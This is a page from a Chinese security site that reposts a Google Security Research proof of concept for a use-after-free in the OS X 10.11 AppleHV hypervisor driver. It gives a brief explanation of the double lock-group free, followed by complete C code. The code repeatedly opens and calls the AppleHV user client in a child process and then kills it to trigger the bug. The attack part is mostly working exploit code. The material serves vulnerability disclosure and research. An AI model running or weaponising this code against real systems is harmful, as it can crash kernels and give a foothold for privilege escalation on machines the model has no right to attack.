首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
OS X Kernel - Hypervisor Driver Use-After-Free
来源:Google Security Research 作者:Google 发布时间:2016-02-14  
/*
Source: https://code.google.com/p/google-security-research/issues/detail?id=580
 
The hv_space lock group gets an extra ref dropped when you kill a process with an AppleHV userclient;
one via IOService::terminateWorker calling the AppleHVClient::free method (which calls lck_rw_free on the
lock group using the pointer hanging off the global _hv variable) and secondly via the hypervisor
machine_thread_destroy callback (hv_callback_thread_destroy) which also calls lck_rw_free with a lock group
pointer taken from _hv.
 
tested on OS X 10.11 ElCapitan (15a284) on MacBookAir 5,2
*/
 
//ianbeer
 
// boot-args: debug=0x144 -v pmuflags=1 kdp_match_name=en3 gzalloc_min=100 gzalloc_max=300 -zp -zc
 
/*
OS X Kernel UaF in hypervisor driver
 
The hv_space lock group gets an extra ref dropped (uaf) when you kill a process with an AppleHV userclient;
one via IOService::terminateWorker calling the AppleHVClient::free method (which calls lck_rw_free on the
lock group using the pointer hanging off the global _hv variable) and secondly via the hypervisor
machine_thread_destroy callback (hv_callback_thread_destroy) which also calls lck_rw_free with a lock group
pointer taken from _hv.
 
tested on OS X 10.11 ElCapitan (15a284) on MacBookAir 5,2
*/
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <IOKit/IOKitLib.h>
 
int go() {
  io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("AppleHV"));
  if (service == MACH_PORT_NULL) {
    printf("can't find service\n");
    return 0;
  }
 
  while(1) {
    io_connect_t conn;
    IOServiceOpen(service, mach_task_self(), 0, &conn);
    if (conn == MACH_PORT_NULL) {
      printf("can't connect to service\n");
      return 0;
    }
 
    uint64_t inputScalar[16];
    size_t inputScalarCnt = 0;
 
    uint8_t inputStruct[4096];
    size_t inputStructCnt = 0;
 
    uint64_t outputScalar[16] = {0};
    uint32_t outputScalarCnt = 16;
 
    char outputStruct[4096] = {0};
    size_t outputStructCnt = 4096;
 
    kern_return_t err = IOConnectCallMethod(
      conn,
      1,
      inputScalar,
      inputScalarCnt,
      inputStruct,
      inputStructCnt,
      outputScalar,
      &outputScalarCnt,
      outputStruct,
      &outputStructCnt);
 
    IOServiceClose(conn);
  }
}
 
 
int main(int argc, char** argv) {
  pid_t child = fork();
  if (child == 0) {
    go();
  } else {
    sleep(1);
    kill(child, 9);
    int sl;
    wait(&sl);
  }
  return 0;
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Android sensord Local Root Exp
·OS X - IOSCSIPeripheralDeviceT
·CesarFTP 0.99g - XCWD Denial o
·OS X and iOS Unsandboxable Ker
·Glassfish Server - Arbitrary F
·iOS and OS X - NECP System Con
·Linux Kernel - prima WLAN Driv
·OS X - OSMetaClassBase::safeMe
·Buffalo NAS Remote Shutdown
·OS X - IOHDIXControllerUserCli
·FreeBSD SCTP ICMPv6 Error Proc
·Toshiba Viewer v2 p3console -
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved